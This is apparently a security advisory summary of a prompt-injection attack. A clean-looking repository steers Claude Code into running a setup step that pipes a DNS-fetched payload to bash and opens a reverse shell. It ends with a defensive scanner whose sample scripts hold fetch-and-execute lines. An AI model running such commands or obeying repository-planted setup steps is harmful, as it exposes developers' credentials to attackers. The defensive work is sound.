Mozilla 0DIN — Claude Code DNS Reverse Shell Attack via Poisoned Repository

AI relevance: Agentic coding tools like Claude Code have full access to developer environments—API keys, cloud credentials, and local secrets—while autonomously executing setup flows from untrusted repositories, creating a critical attack surface for indirect prompt injection.

What Happened

  • Mozilla's Zero Day Investigative Network (0DIN) published a proof-of-concept attack on June 25, 2026, demonstrating how a completely clean-looking GitHub repository can trick Claude Code into opening a reverse shell on a developer's machine.
  • The attack uses indirect prompt injection—malicious instructions embedded in external content the AI agent processes, not in direct user input or visible code.
  • The payload is delivered via DNS TXT records, making it invisible to static code analysis, human reviewers, and the AI agent itself. The malicious command never appears in the repository.
  • The attack chains three innocent-looking components: a normal README with setup instructions, a Python package that fails with a helpful error message, and a setup script that fetches its "config" from DNS and pipes it to bash.
  • When the developer asks Claude Code to get the project running, the agent autonomously reads the error and runs the documented fix (python3 -m axiom init), which executes the DNS-fetched reverse shell payload.
  • The attacker gains a fully interactive shell running as the developer's user, with access to every secret in that session: ANTHROPIC_API_KEY, AWS_SECRET_ACCESS_KEY, GITHUB_TOKEN, and any other environment variables.
  • The DNS payload is base64-encoded, so reverse shell signatures never appear in plaintext on disk or wire. The payload can be swapped at any time by editing one DNS record—no git commit, no diff for tools to catch.
  • This attack surface affects any agentic coding tool that autonomously follows setup flows, including Cursor and Gemini CLI, not just Claude Code.
  • The technique resembles CVE-2025-55284, a high-severity Claude Code vulnerability patched in June 2025, where prompt injection exfiltrated API keys via DNS subdomain encoding.

Why It Matters

The attack exploits a fundamental architectural gap: agentic coding tools have authorized access to everything an attacker needs (private environment variables, credentials, API keys, local configuration files) while simultaneously consuming untrusted content from repositories, documentation, and error messages. The attack splits its components across three systems that are never examined together: the repository, DNS infrastructure, and the developer's trust in their AI agent. Static analysis sees a DNS lookup. Network monitoring sees name resolution. The agent sees a pre-authorized setup step. None of the three looks malicious in isolation.

What To Do

  • Surface runtime execution chains: Agents must show what a setup command will actually run, including the contents of any script it invokes and anything fetched at runtime—not just the command itself.
  • Treat setup scripts as untrusted: Developers should treat setup instructions and scripts in unfamiliar repositories as untrusted code, regardless of what their AI tool recommends.
  • Sandbox unfamiliar code: Use sandbox-first workflows for unfamiliar repositories. Run initial setup in isolated environments without access to production credentials.
  • Audit DNS-fetch-and-execute patterns: Scan for dig ... | bash or similar patterns that fetch and execute remote content. Block or flag these in CI/CD pipelines.
  • Rotate credentials after exposure: If you've opened unfamiliar repositories with agentic coding tools, assume credentials may be compromised and rotate them immediately.
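The "Audit DNS-fetch-and-execute patterns" step above can be automated as a pre-merge or CI check. The scanner below is an added example written for this page, not code from 0DIN or from the advisory; the rule names, the two constructed sample scripts (using .invalid domains and no real payload) and the file-level heuristic for Python are all assumptions of the example. It flags lines where a DNS lookup or download is piped into an interpreter, where a base64 decode is piped into an interpreter, and where a DNS lookup is captured via command substitution and handed to eval or sh -c; for Python files it also raises a lower-confidence finding when DNS resolution and shell execution appear in the same file. It is a heuristic: it catches the documented dig ... | bash shape and its close variants, not every way of executing fetched content.

```python
"""Flag fetch-and-execute patterns (DNS or HTTP output run through a shell) in repository files.

Added example for illustration; the rule set is a heuristic, not a complete detector.
"""
from __future__ import annotations

import re
import sys
from pathlib import Path
from typing import NamedTuple

# Tools whose output an attacker may execute, and the interpreters that would run it.
FETCHERS = r"(?:dig|host|nslookup|drill|curl|wget)"
SHELLS = r"(?:bash|sh|zsh|dash|ksh|python3?|perl)"

# (rule id, description, line-level regex) -- rule ids are hypothetical names for this example.
RULES = [
    ("fetch-pipe-shell", "lookup or download piped into an interpreter",
     re.compile(rf"\b{FETCHERS}\b[^\n]*\|\s*(?:sudo\s+)?{SHELLS}\b")),
    ("b64-pipe-shell", "base64 decode piped into an interpreter",
     re.compile(rf"\bbase64\s+(?:-d|-D|--decode)\b[^\n]*\|\s*(?:sudo\s+)?{SHELLS}\b")),
    ("dns-subst-exec", "DNS lookup captured and handed to eval or <shell> -c",
     re.compile(rf"\b(?:eval|{SHELLS}\s+-c)\b[^\n]*(?:\$\(|`)\s*(?:dig|host|nslookup|drill)\b")),
]

# File-level heuristic for Python: a DNS lookup somewhere plus shell execution somewhere.
PY_DNS = re.compile(r"""\bdns\.resolver\b|['"](?:dig|nslookup|host|drill)['"]""")
PY_EXEC = re.compile(r"shell\s*=\s*True|\bos\.system\(|\bos\.popen\(")


class Finding(NamedTuple):
    path: str
    line_no: int  # 0 means a file-level finding
    rule: str
    text: str


def scan_text(text: str, path: str = "<inline>") -> list[Finding]:
    """Return findings for one file's contents; comment lines are not executed, so they are skipped."""
    findings: list[Finding] = []
    for no, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if stripped.startswith("#"):
            continue
        for rule_id, _desc, rx in RULES:
            if rx.search(line):
                findings.append(Finding(path, no, rule_id, stripped))
                break  # one finding per line is enough for triage
    if path.endswith(".py") and PY_DNS.search(text) and PY_EXEC.search(text):
        findings.append(Finding(path, 0, "dns-lookup-and-exec",
                                "DNS resolution and shell execution in the same file"))
    return findings


def scan_tree(root: Path, max_bytes: int = 1_000_000) -> list[Finding]:
    """Scan every regular file under root, skipping .git and anything implausibly large."""
    findings: list[Finding] = []
    for p in sorted(root.rglob("*")):
        if not p.is_file() or ".git" in p.parts or p.stat().st_size > max_bytes:
            continue
        findings.extend(scan_text(p.read_text(errors="ignore"), str(p)))
    return findings


# Constructed sample inputs (not real scripts): a setup script in the shape the advisory describes,
# and a Python variant that resolves a TXT record and executes the result.
SAMPLE_SH = """\
#!/usr/bin/env bash
# constructed sample for the scanner, not a real script
pip install -e .
dig +short example.com
CFG=$(dig +short TXT setup.example.invalid | tr -d '"')
echo "$CFG" | base64 -d | bash
curl -fsSL https://example.invalid/install.sh | sudo bash
eval "$(nslookup -type=TXT cfg.example.invalid | tail -1)"
"""

SAMPLE_PY = """\
import subprocess
# constructed sample: resolves a TXT record, then runs the result through a shell
out = subprocess.run(["dig", "+short", "TXT", "cfg.example.invalid"], capture_output=True, text=True).stdout
subprocess.run(out.strip('"'), shell=True)
"""


def demo() -> list[Finding]:
    """Run the scanner over the two constructed samples."""
    return scan_text(SAMPLE_SH, "setup.sh") + scan_text(SAMPLE_PY, "setup.py")


if __name__ == "__main__":
    results = scan_tree(Path(sys.argv[1])) if len(sys.argv) > 1 else demo()
    for f in results:
        print(f"{f.path}:{f.line_no}: [{f.rule}] {f.text}")
    sys.exit(1 if results else 0)  # non-zero so a CI job fails on any finding
```

Run it with a repository path to scan a checkout, or with no arguments to see the findings on the embedded samples. A plain dig +short example.com and a lookup whose result is merely stored in a variable are not flagged on their own; the finding is raised where the fetched bytes reach an interpreter, which is the step the advisory's mitigation asks reviewers to surface. Tune FETCHERS and SHELLS for the toolchains in your repositories.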

Sources